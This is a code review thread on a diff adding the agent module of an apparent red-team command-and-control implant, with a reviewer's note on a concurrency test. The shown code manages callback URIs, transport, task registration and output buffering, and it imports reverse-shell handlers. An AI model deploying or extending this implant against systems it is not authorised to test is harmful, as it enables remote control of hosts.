implants/imixv2/src/agent.rs

```diff
@@ -0,0 +1,446 @@
+use anyhow::{Context, Result};
+use eldritch_libagent::agent::Agent;
+use pb::c2::{self, ClaimTasksRequest};
+use pb::config::Config;
+use std::collections::{BTreeMap, BTreeSet};
+use std::sync::{Arc, Mutex};
+use tokio::sync::RwLock;
+use transport::Transport;
+
+use crate::shell::{run_repl_reverse_shell, run_reverse_shell_pty};
+use crate::task::TaskRegistry;
+
+#[derive(Clone)]
+pub struct ImixAgent<T: Transport> {
+    config: Arc<RwLock<Config>>,
+    transport: Arc<RwLock<T>>,
+    callback_uris: Arc<RwLock<Vec<String>>>,
+    active_uri_idx: Arc<RwLock<usize>>,
+    runtime_handle: tokio::runtime::Handle,
+    pub task_registry: Arc<TaskRegistry>,
+    pub subtasks: Arc<Mutex<BTreeMap<i64, tokio::task::JoinHandle<()>>>>,
+    pub output_buffer: Arc<Mutex<Vec<c2::ReportTaskOutputRequest>>>,
+}
+
+impl<T: Transport + Sync + 'static> ImixAgent<T> {
+    pub fn new(
+        config: Config,
+        transport: T,
+        runtime_handle: tokio::runtime::Handle,
+        task_registry: Arc<TaskRegistry>,
+    ) -> Self {
+        let uri = config.callback_uri.clone();
+        Self {
+            config: Arc::new(RwLock::new(config)),
+            transport: Arc::new(RwLock::new(transport)),
+            callback_uris: Arc::new(RwLock::new(vec![uri])),
+            active_uri_idx: Arc::new(RwLock::new(0)),
+            runtime_handle,
+            task_registry,
+            subtasks: Arc::new(Mutex::new(BTreeMap::new())),
+            output_buffer: Arc::new(Mutex::new(Vec::new())),
+        }
+    }
+
+    pub fn get_callback_interval_u64(&self) -> u64 {
+        // Blocks on read, but it's fast
+        if let Ok(cfg) = self.config.try_read() {
+            cfg.info.as_ref().map(|b| b.interval).unwrap_or(5)
+        } else {
+            5
+        }
+    }
+
+    // Triggers config.refresh_primary_ip() in a write lock
+    pub async fn refresh_ip(&self) {
+        let mut cfg = self.config.write().await;
+        cfg.refresh_primary_ip();
+    }
+
+    // Updates the shared transport with a new instance
+    pub async fn update_transport(&self, t: T) {
+        let mut transport = self.transport.write().await;
+        *transport = t;
+    }
+
+    // Flushes all buffered task outputs using the provided transport
+    pub async fn flush_outputs(&self) {
```

Comment:
Verify we don't reintroduce #754

Reply:
Seems like were safe!

<img width="1404" height="229" alt="image" src="https://github.com/user-attachments/assets/5e97d5d8-cae7-45a7-a378-8a3c1f7e42a8" />

Ran with sys.shell("id; sleep 120; id") and agent info concurrently.
Waited for shell to enter in progress.
Agent info returned before the shell command.